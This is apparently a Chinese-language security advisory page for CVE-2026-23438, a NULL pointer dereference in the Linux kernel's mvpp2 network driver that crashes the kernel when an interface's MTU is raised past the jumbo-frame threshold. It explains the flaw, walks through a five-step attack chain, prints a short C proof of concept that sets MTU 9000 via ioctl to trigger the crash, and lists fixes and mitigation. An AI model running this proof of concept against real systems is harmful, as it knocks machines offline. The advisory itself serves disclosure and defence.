CVE-2026-23438 CVSS 5.5 中危

CVE-2026-23438 Linux内核mvpp2驱动拒绝服务漏洞

披露日期: 2026-04-03

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-23438

漏洞类型

空指针引用

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的mvpp2驱动程序存在一个安全漏洞，该漏洞源于在缓冲区切换过程中对流控制更新缺乏必要的保护。具体而言，`mvpp2_bm_switch_buffers`函数无条件调用`mvpp2_bm_pool_update_priv_fc`，该函数访问`priv->cm3_base`时未检查空指针。如果设备树中缺少CM3 SRAM资源，该指针将为NULL。任何触发缓冲区切换的操作（如MTU变更）都将导致内核空指针解引用错误，进而引发系统崩溃。

技术细节

该漏洞发生在Linux内核的网络驱动`mvpp2`中，主要涉及缓冲区管理逻辑。问题代码位于`mvpp2_bm_switch_buffers`函数，该函数负责在per-cpu和共享缓冲池模式之间切换。在此过程中，它无条件调用了`mvpp2_bm_pool_update_priv_fc`来更新流控制寄存器。该更新函数通过`mvpp2_cm3_read`和`mvpp2_cm3_write`访问硬件寄存器，这两个函数直接解引用`priv->cm3_base`指针。
然而，当设备树（DTS）中未包含CM3 SRAM资源时（即缺少第三个reg条目），`priv->cm3_base`保持为NULL，且`priv->global_tx_fc`标志为false。驱动程序中的其他流控制调用点都正确地使用了`global_tx_fc`或`tx_fc`标志来守卫硬件访问，唯独`mvpp2_bm_switch_buffers`遗漏了此检查。因此，当具有低权限的本地用户执行特定操作（如更改MTU大小超过巨型帧阈值）触发该路径时，内核将尝试读取地址0x0，导致空指针解引用异常，造成系统崩溃或拒绝服务。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者需要获取目标系统的低权限本地访问能力（PR:L）。

STEP 2

步骤2：识别网络接口

攻击者识别出由mvpp2驱动程序管理的网络接口。

STEP 3

步骤3：触发MTU变更

攻击者执行命令或程序（如`ip link set mtu 9000`），修改接口的MTU值使其超过巨型帧阈值。

STEP 4

步骤4：执行漏洞代码

内核执行`mvpp2_change_mtu`，进而调用`mvpp2_bm_switch_buffers`。由于缺少NULL检查，尝试访问`priv->cm3_base`。

STEP 5

步骤5：系统崩溃

发生内核空指针解引用错误（Kernel Oops），导致系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/if.h>

// PoC for CVE-2026-23438
// Trigger: Changing MTU on mvpp2 interface to cross jumbo frame threshold
// Requires a vulnerable interface (e.g., eth0 handled by mvpp2)
// and specific DT configuration missing CM3 SRAM.

int main(int argc, char *argv[]) {
    int sock;
    struct ifreq ifr;
    const char *ifname = "eth0"; // Replace with actual mvpp2 interface

    if (argc > 1) ifname = argv[1];

    sock = socket(AF_INET, SOCK_DGRAM, 0);
    if (sock < 0) {
        perror("socket");
        return 1;
    }

    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, ifname, IFNAMSIZ - 1);

    // Set MTU to a value that triggers jumbo frame threshold (e.g., 9000)
    // This triggers mvpp2_bm_switch_buffers -> mvpp2_bm_pool_update_priv_fc
    // -> mvpp2_cm3_read -> NULL pointer dereference
    ifr.ifr_mtu = 9000;

    if (ioctl(sock, SIOCSIFMTU, &ifr) < 0) {
        perror("ioctl SIOCSIFMTU");
        close(sock);
        return 1;
    }

    printf("MTU changed to %d. If vulnerable, kernel should panic/crash.\n", ifr.ifr_mtu);
    close(sock);
    return 0;
}

影响范围

Linux Kernel < Commit 8baced53a35fc9710f80d6ca016a2c418dc3231f

Linux Kernel < Commit 8a63baadf08453f66eb582fdb6dd234f72024723

Linux Kernel < Commit 7df2b50cae1a76cbb90b294f3edb61e3e10bf2e9

Linux Kernel < Commit 7bd20f4b3ef3044dc55acd5b8ef748a70d29d03f

Linux Kernel < Commit 0cfcd31f98fc608dc9406bff3fee3a9dd364d014

防御指南

临时缓解措施

建议立即更新Linux内核以修复此空指针引用漏洞。在无法立即更新的情况下，可以通过限制本地用户对网络接口进行MTU修改的权限来降低触发风险，但这无法完全解决内核层面的逻辑缺陷。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表